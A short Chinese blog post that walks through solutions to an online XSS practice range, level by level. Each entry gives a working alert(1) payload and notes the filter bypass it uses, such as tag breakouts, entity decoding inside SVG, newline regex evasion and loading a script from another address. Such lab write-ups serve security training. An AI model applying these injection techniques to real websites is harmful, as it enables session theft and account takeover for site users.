阅读 91

XSS弹窗专项练习

靶场训练

网址 xss.haozi.me/#/0x00

0x00

<script>alert(1)</script>
复制代码

0x01

</textarea><script>alert(1)</script><textarea>
复制代码

0x02

"><script>alert(1)</script>
复制代码

0x03

代替()

<script>alert`1`</script>
复制代码

0x04

<svg>会将转义字符转换回来

<svg><script>alert&#40;1&#41;</script>
复制代码

0x05

--!><script>alert(1)</script>
复制代码

0x06

将输入框类型换为图片 放入错误src路径 通过换行绕过正则表达式

type="image" src="##" onerror
="alert(1)"
复制代码

0x07

<body onload="alert(1)"
复制代码

0x08

</style
><script>alert(1)</script>
复制代码

0x09

先绕进if然后将script标签关闭 注释掉后面代码

https://www.segmentfault.com"></script><script>alert(1)</script> //
复制代码

0x0A

更改src地址为个人地址

https://www.segmentfault.com@xss.js
复制代码

0x12

\"+alert('1'))</script>\\
复制代码
文章分类
前端
文章标签